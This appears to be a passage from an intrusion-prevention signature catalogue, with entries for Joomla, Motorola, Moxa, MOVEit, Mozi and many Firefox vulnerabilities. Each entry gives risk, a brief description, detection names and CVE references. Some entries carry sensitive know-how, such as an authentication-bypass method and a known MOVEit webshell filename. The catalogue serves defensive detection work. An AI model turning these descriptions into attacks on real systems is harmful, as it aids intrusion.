https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11615

MosConfig-Absolute-Path-Remote-File-Include-Vulnerability

About this vulnerability:

MosConfig Absolute Path Remote File Include Vulnerability

Risk:

High

First detected in:

sgpkg-ips-336-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Joomla

Type:

Input Validation

Description:

The Visites component for Joomla! is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system. Visites 1.1 RC2 is vulnerable; other versions may also be affected.

Situation:

HTTP_CS-MosConfig-Code-Injection-Remote-Compromise-2
HTTP_CSU-MosConfig-Code-Injection-Remote-Compromise

References:

CVE-2010-2918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2918

BID-28942
http://www.securityfocus.com/bid/28942

Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Motorola Timbuktu Pro

Risk:

High

First detected in:

sgpkg-ips-119-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Motorola Timbuktu

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Motorola Timbuktu Pro. A crafted login request to the target host allows arbitrary code execution with the System level privileges.

Situation:

Generic_UDP-Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow
Generic_Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow

References:

CVE-2007-4221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4221

BID-25454
http://www.securityfocus.com/bid/25454

Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Motorola Timbuktu Pro

Risk:

High

First detected in:

sgpkg-ips-233-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Motorola Timbuktu Pro

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Motorola Timbuktu Pro. The flaw is due to a boundary error when Motorola Timbuktu Pro handles requests sent to the \PlughNTCommand pipe. Remote attackers could exploit this vulnerability by sending malformed data to the the Timbuktu Pro process, causing either arbitrary code execution in the context of the SYSTEM user, or a denial of service condition.

Situation:

SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow-3
SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow
SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow-2

References:

CVE-2009-1394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1394

BID-35496
http://www.securityfocus.com/bid/35496

Motorola-WR850G-Authentication-Bypass

About this vulnerability:

A Motorola WR850G Authentication Bypass vulnerability.

Risk:

High

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Motorola Router

Type:

Insecure Configuration

Description:

A vulnerability in Motorola WR850G wireless router, firmware version 4.03, which allows remote attackers to bypass authentication and log in as Administrator by repeatedly making an HTTP request for ver.asp until an administrator logs in.

Situation:

HTTP_CS-Motorola-WR850G-Authentication-Bypass

References:

CVE-2004-1550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1550

OSVDB-10232
http://www.osvdb.org/10232

Movable-Type-Remote-Code-Execution

About this vulnerability:

A Movable Type Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Movable Type

Type:

Code Injection

Description:

A vulnerability in Movable Type, versions 4.2x and 4.3x through 4.38, which allows remote attackers to conduct eval injection and SQL injections via crafted parameters. This covers CVE-2012-6315 which was labeled a duplicate.

Situation:

HTTP_CRL_Movable-Type-Remote-Code-Execution

References:

CVE-2013-0209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0209

OSVDB-89322
http://www.osvdb.org/89322

MOVEit-Transfer-SQL-Injection-Post-Exploit

About this vulnerability:	An attempt to exploit a vulnerability in MOVEit detected
Risk:	High
First detected in:	sgpkg-ips-1597-5242
Last changed:	sgpkg-ips-1597-5242
Platform:	Generic
Software:	MOVEit
Type:	SQL Injection
Description:	After exploiting the SQL injection vulnerability CVE-2023-34362 of MOVEit Transfer, one of the known webshells is "human2.aspx". This fingerprint aims to block the traffic to and from this webshell. It is not supposed to prevent CVE-2023-34362 from being exploited in the first place.
Situation:	File-Text_MOVEit-Transfer-SQL-Injection-Post-Exploit HTTP_CSH-MOVEit-Transfer-SQL-Injection-Post-Exploit

MOXA-Device-Credential-Retrieval

About this vulnerability:

A Moxa Device Credential Retrieval vulnerability

Risk:

High

First detected in:

sgpkg-ips-1028-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Moxa NPort

Type:

Insecure Configuration

Description:

A vulnerability in Moxa devices with firmware versions older than 2017 or late 2016, which allows remote attackers retrieve admin credentials and SNMP read and read/write community strings without authentication.

Situation:

Generic_UDP-MOXA-Device-Credential-Retrieval

References:

CVE-2016-9361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9361

BID-85965
http://www.securityfocus.com/bid/85965

MOXA-Device-Manager-Tool-Buffer-Overflow

About this vulnerability:

A MOXA Device Manager Tool Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-786-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MOXA Device Manager Tool

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in MOXA Device Manager Tool, versions before 2.3, which allows remote attackers to execute arbitrary code via crafted data in a sission on TCP port 54321.

Situation:

Generic_SS-MOXA-Device-Manager-Tool-Buffer-Overflow

References:

CVE-2010-4741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4741

OSVDB-69027
http://www.osvdb.org/69027

Moxa-MXview-Path-Traversal-CVE-2021-38452

About this vulnerability:

An attempt to exploit a vulnerability in Moxa MXview

Risk:

High

First detected in:

sgpkg-ips-1436-5242

Last changed:

sgpkg-ips-1436-5242

Platform:

Generic

Software:

Moxa MXview

Type:

Input Validation

Description:

A path traversal vulnerability has been reported in Moxa MXview. Successful exploitation of this vulnerability allows unauthenticated attackers to read arbitrary files and gain access to sensitive information, such as the MQTT broker password.

Situation:

HTTP_CSU-Moxa-MXview-Path-Traversal-CVE-2021-38452

References:

CVE-2021-38452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38452

MOXA-SoftCMS-Cgi-Program-SQL-Injection

About this vulnerability:

A vulnerability in Moxa SoftCMS

Risk:

Moderate

First detected in:

sgpkg-ips-796-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Moxa SoftCMS

Type:

Input Validation

Description:

Insufficient validation of URI parameter causes an SQL injection vulnerability in Moxa SoftCMS. A successful exploitation allows an attacker to perform SQL operations and possibly execute code.

Situation:

HTTP_CSU-MOXA-SoftCMS-Cgi-Program-SQL-Injection

References:

CVE-2016-5792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5792

Mozart-Loader-Traffic

About this vulnerability:	Mozart Loader traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1237-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Mozart is a Windows-based trojan capable to run arbitrary commands on the infected system.
Situation:	DNS-UDP_Mozart-Loader-Traffic

Mozi-Botnet-Traffic

About this vulnerability:	Mozi botnet traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1222-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Mozi is a P2P botnet capable to run specific commands or payloads and launch denial-of-service attacks.
Situation:	HTTP_CSH-Mozi-Botnet-Traffic P2P-UDP_Mozi-Botnet-DHT-Traffic

Mozilla-BMP-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in Mozilla

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1730-5242

Platform:

Generic

Software:

Mozilla Browser; Mozilla Firefox; Mozilla Thunderbird; Netscape

Type:

Integer Overflow

Description:

A vulnerability exists in the way several versions of the Mozilla web browser parses BMP images. The browser is not equipped to handle a BMP image with an overly large width value. This vulnerability may be leveraged by an attacker to execute arbitrary code on a target user's system or create a denial of service condition.

References:

BID-11171
http://www.securityfocus.com/bid/11171

Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution

About this vulnerability:

A vulnerability in Mozilla family of browsers

Risk:

High

First detected in:

sgpkg-ips-99-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Foundation's family of browser products. The vulnerability is due to an error when processing certain malformed or specially crafted JavaScript code. Successful exploitation of this issue causes a denial of service condition and allows remote attackers to execute arbitrary code in the context of the target browser.

Situation:

HTTP_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution
File-Text_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution
File-Text_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution-2

References:

CVE-2007-0777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777

BID-22694
http://www.securityfocus.com/bid/22694

OSVDB-32115
http://www.osvdb.org/32115

Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type

About this vulnerability:

A code execution vulnerability in Mozilla browsers

Risk:

High

First detected in:

sgpkg-ips-99-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Suite; Mozilla Firefox; Netscape

Type:

Malfunction

Description:

There is a vulnerability in the Mozilla family of browsers. The browser fails to validate the argument type to InstallVersion.compareTo() JavaScript function, leading to code execution in the context of the current user.

Situation:

HTTP_Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type
File-Text_Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type

References:

CVE-2005-2265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2265

BID-14242
http://www.securityfocus.com/bid/14242

Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Mozilla Firefox and Seamonkey

Risk:

High

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Firefox and Mozilla Seamonkey. The vulnerability allows remote attackers to execute arbitary code in the context of the current user.

Situation:

HTTP_SS-Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption
File-Text_Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption

References:

CVE-2007-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1092

BID-22679
http://www.securityfocus.com/bid/22679

OSVDB-32103
http://www.osvdb.org/32103

Mozilla-CSS-Border-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla

Risk:

Moderate

First detected in:

sgpkg-ips-157-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Thunderbird; Mozilla Suite; Mozilla SeaMonkey

Type:

Malfunction

Description:

There is a vulnerability in various Mozilla-based browsers in the way they handle border definitions in Cascading Style Sheets (CSS). A malicious space may specify out of bound values for border definitions, causing memory corruption that may lead to abnormal termination of the browser or code execution in the context of the current user.

Situation:

HTTP_SS-Mozilla-CSS-Border-Memory-Corruption
File-Text_Mozilla-CSS-Border-Memory-Corruption

References:

CVE-2006-1739
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1739

BID-17516
http://www.securityfocus.com/bid/17516

OSVDB-24660
http://www.osvdb.org/24660

Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mozilla Firefox; Mozilla Thunderbird

Type:

Malfunction

Description:

A code execution vulnerability exists in Mozilla Firefox and Thunderbird. The vulnerability is due to a design weakness when the applications attempt to load a dynamic link library (sensor.dll). Remote attackers could exploit this vulnerability by enticing target users to open an HTML page from a WebDAV or an SMB share that also hosts a malicious DLL file. In a successful attack the behaviour of the target host depends entirely on the intended function of the malicious DLL file. In this case, the code would be executed in the security context of the user running the application.

Situation:

SMB-TCP_Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading
File-Text_Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading

References:

CVE-2011-2980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2980

BID-49217
http://www.securityfocus.com/bid/49217

OSVDB-74583
http://www.osvdb.org/74583

Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Mozilla Firefox.

Situation:

HTTP_SS-Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow
File-PNG_Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow

References:

CVE-2008-4064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4064

BID-31346
http://www.securityfocus.com/bid/31346

Mozilla-Firefox-Browser-Engine-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-229-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Firefox. This flaw is due to the way Mozilla Firefox handles first-letter CSS style elements. A remote attacker can exploit this vulnerability by persuading a target user to open a malicious web page. Successful attacks can allow arbitrary code injection and execution with the security privileges of the current user. If code execution is successful, the behavior of the target depends on the intention of the attacker. In the case of an unsuccessful code execution attack, Firefox may terminate abnormally.

Situation:

HTTP_SS-Mozilla-Firefox-Browser-Engine-Memory-Corruption
File-Text_Mozilla-Firefox-Browser-Engine-Memory-Corruption

References:

CVE-2009-1392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1392

BID-35326
http://www.securityfocus.com/bid/35326

OSVDB-55147
http://www.osvdb.org/55147

OSVDB-55146
http://www.osvdb.org/55146

OSVDB-55145
http://www.osvdb.org/55145

OSVDB-55144
http://www.osvdb.org/55144

Mozilla-Firefox-Built-In-PDF-Viewer-Same-Origin-Policy-Bypass

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-672-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

A same-origin policy bypass vulnerability exists in Mozilla Firefox. The vulnerability is due to a design flaw in the built-in PDF Viewer. By enticing a target user to view a crafted page that contains malicious script code, an attacker can exploit this vulnerability to read and steal sensitive local files on the victim's computer.

Situation:

File-Text_Mozilla-Firefox-Built-In-PDF-Viewer-Same-Origin-Policy-Bypass

References:

CVE-2015-4495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4495

BID-76249
http://www.securityfocus.com/bid/76249

Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass

About this vulnerability:

Privilege restriction bypass vulnerability with Mozilla Firefox chrome pages

Risk:

Moderate

First detected in:

sgpkg-ips-40-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Suite

Type:

Malfunction

Description:

A vulnerability exists in the Mozilla Firefox and Mozilla Suite in the handling of the chrome pages. By creating a specially crafted HTML page a remote attacker could try to deceive a user to execute malicious code with the chrome page privileges.

Situation:

HTTP_Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass
File-Text_Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass

References:

CVE-2005-2706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2706

BID-14920
http://www.securityfocus.com/bid/14920

OSVDB-19648
http://www.osvdb.org/19648

Mozilla-Firefox-Chrome-URL-Information-Disclosure

About this vulnerability:	Mozilla Firefox Chrome URL Information Disclosure
Risk:	Low
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Mozilla Firefox
Type:	Malfunction
Description:	A vulnerability exists in Mozilla Firefox 1.8 and prior.
Situation:	File-Text_Mozilla-Firefox-Chrome-URL-Information-Disclosure

Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-221-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Firefox. This flaw is due to improper handling of a script that manipulates text objects in an HTML document. A remote attacker can exploit this vulnerability by persuading the target user to open a malicious web page.

Situation:

HTTP_SS-Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption
File-Text_Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption

References:

CVE-2009-1313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1313

BID-34743
http://www.securityfocus.com/bid/34743

Mozilla-Firefox-Constructframe-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Mozilla Firefox web browser. The vulnerability is due to an implementation error when handling the first letter frame. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious web page. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be run with privileges of the currently logged on user. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.

Situation:

File-Text_Mozilla-Firefox-Constructframe-Memory-Corruption

References:

CVE-2009-2462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2462

BID-35765
http://www.securityfocus.com/bid/35765

Mozilla-Firefox-Createimagebitmap-Integer-Overflow

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-892-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Mozilla Firefox. A remote attacker can use this to disclose sensitive information or potentially execute arbitrary code.

Situation:

File-Text_Mozilla-Firefox-Createimagebitmap-Integer-Overflow

References:

CVE-2017-5428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5428

Mozilla-Firefox-Cross-Domain-Information-Disclosure

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Mozilla Firefox. A remote attacker can use this to access sensitive information.

Situation:

File-Text_Mozilla-Firefox-Cross-Domain-Information-Disclosure

References:

CVE-2012-4192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4192

OSVDB-86126
http://www.osvdb.org/86126

Mozilla-Firefox-CVE-2014-1510-Webidl-Implementation-Privilege-Escalation

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox ESR

Risk:

Moderate

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla based browsers

Type:

Input Validation

Description:

A privilege escalation vulnerability has been reported in Mozilla Firefox, Thunderbird, and Seamonkey. The vulnerability is due to a failed security check on a chrome:// URL. An attacker could exploit this vulnerability by enticing a user to open a crafted webpage. The vulnerability could be exploited, or chained with other vulnerabilities, to execute arbitrary code in the security context of the target user.

Situation:

File-Text_Mozilla-Firefox-CVE-2014-1510-Webidl-Implementation-Privilege-Escalation

References:

CVE-2014-1510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1510

BID-66206
http://www.securityfocus.com/bid/66206

OSVDB-104593
http://www.osvdb.org/104593

Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption

About this vulnerability:

Detected attempt to exploit a vulnerability in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-393-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Input Validation

Description:

There is a vulnerability in Mozilla Firefox.

Situation:

HTTP_SS-Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption-2
HTTP_SS-Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
File-Text_Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
File-Text_Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption-2

References:

CVE-2010-3765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3765

BID-44425
http://www.securityfocus.com/bid/44425

Mozilla-Firefox-Domnoderemoved-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Malfunction

Description:

A memory corruption vulnerability has been discovered in the Mozilla Firefox product. The flaw concerns document structure changes during a DOMNodeRemoved event. Exploitation of this vulnerability may possibly result in arbitrary code execution on the target user's host. In the case of an unsuccessful code injection attack attempt, the vulnerable browser application will terminate. All instances of the Firefox browser will be shut down. In the case of a successful code injection attack attempt, the flow of the vulnerable process will be diverted to an arbitrary location. The behaviour of the host is at that point dependent on the intention of the injected code.

Situation:

File-Text_Mozilla-Firefox-Domnoderemoved-Memory-Corruption

References:

CVE-2006-2779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2779

BID-18228
http://www.securityfocus.com/bid/18228

Mozilla-Firefox-Domsvglength-Reflected-Attribute-Use-After-Free

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

A use after free vulnerability exists in Mozilla Firefox. The vulnerability is due to an issue with handling DOMSVGLength objects. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a malicious page. Successful exploitation could lead to arbitrary code execution under the security context of the browser.

Situation:

File-TextId_Mozilla-Firefox-Domsvglength-Reflected-Attribute-Use-After-Free

References:

CVE-2014-1563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1563

OSVDB-110719
http://www.osvdb.org/110719

Mozilla-Firefox-enablePrivilege-Vulnerable-Function

About this vulnerability:	Firefox enablePrivilege vulnerable function call
Risk:	Moderate
First detected in:	sgpkg-ips-586-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey
Type:	Insecure Configuration
Description:	Mozilla .enablePrivilege function has been deprecated as insecure since 2012.
Situation:	File-Text_Mozilla-Firefox-enablePrivilege-Vulnerable-Function

Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Mozilla Firefox Browser.

Situation:

HTTP_SS-Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption
File-Text_Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption

References:

CVE-2009-1563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1563

BID-36851
http://www.securityfocus.com/bid/36851

Mozilla-Firefox-HTTP-Index-Format-File-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-895-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

Improper parsing of application/http-index-format format content causes an out of bounds read vulnerability in Mozilla Firefox. A successful exploit allows an unautenticated attacker to access user information.

Situation:

File-Text_Mozilla-Firefox-HTTP-Index-Format-File-Out-Of-Bounds-Read

References:

CVE-2017-5444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5444

Mozilla-Firefox-Iconurl-Arbitrary-JavaScript-Execution

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

Low

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1734-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There exosts a vulnerability in Mozilla Firefox.

References:

CVE-2005-1477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1477

BID-13544
http://www.securityfocus.com/bid/13544

Mozilla-Firefox-Iframe-Style-Change-Handling-Code-Execution

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Firefox products. The flaw is due to improper handling of changes to style elements of IFrame objects. A remote attacker can exploit this vulnerability by persuading the target user to open a malicious webpage. Successful attacks could allow for arbitrary code injection and execution with the privileges of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Firefox may terminate abnormally.

Situation:

File-Text_Mozilla-Firefox-Iframe-Style-Change-Handling-Code-Execution

References:

CVE-2008-1236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1236

BID-28448
http://www.securityfocus.com/bid/28448

Mozilla-Firefox-Information-Disclosure-CVE-2013-1675

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-1668-5242

Last changed:

sgpkg-ips-1668-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Mozilla Firefox due to the improper data structure initialisation of the nsDOMSVGZoomEvent::mPreviousScale and nsDOMSVGZoomEvent::mNewScale functions.

Situation:

File-Text_Mozilla-Firefox-Information-Disclosure-CVE-2013-1675

References:

CVE-2013-1675
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1675

Mozilla-Firefox-InstallTrigger-DoS

About this vulnerability:

Mozilla Firefox InstallTrigger DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-669-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Browser

Description:

A vulnerability exists in Mozilla Firefox 1.0.7 that allows remote attackers to cause a denial of service through the mishandling of a Javascript InstallTrigger.install() method.

Situation:

File-Text_Mozilla-Firefox-InstallTrigger-DoS

References:

CVE-2006-1790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1790

BID-17516
http://www.securityfocus.com/bid/17516

OSVDB-24663
http://www.osvdb.org/24663

Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-214-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a vulnerability in Mozilla Firefox. There is insufficient validation with JavaScript internal structures. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page, potentially leading to code execution in the context of the current user.

Situation:

HTTP_SS-Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption
File-Text_Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption

References:

CVE-2009-0773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0773

BID-33990
http://www.securityfocus.com/bid/33990

Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-370-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Buffer Overflow

Description:

A remotely exploitable code execution vulnerability has been reported in the Mozilla Firefox product. The vulnerability is created as a result of a flaw in the implementation of the JavaScript focus method. Exploitation of this vulnerability may allow a malicious user to inject and execute arbitrary code on a target host within the security context of the current user. In an unsuccessful attack case, where the attack does not result in the flow of the process being diverted to injected code, the affected application will terminate. The behaviour of the target system after a successful attack is dependent on the intention of the injected code. In the case of arbitrary code execution, the code is executed within the security context of the current user.

Situation:

HTTP_SS-Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow
File-Text_Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow

References:

CVE-2006-1993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1993

BID-17671
http://www.securityfocus.com/bid/17671

Mozilla-Firefox-Jit-Code-Allocation

About this vulnerability:

A vulnerability in Mozilla Firefox allowing bypass of ASLR and DEP protections

Risk:

High

First detected in:

sgpkg-ips-1162-5242

Last changed:

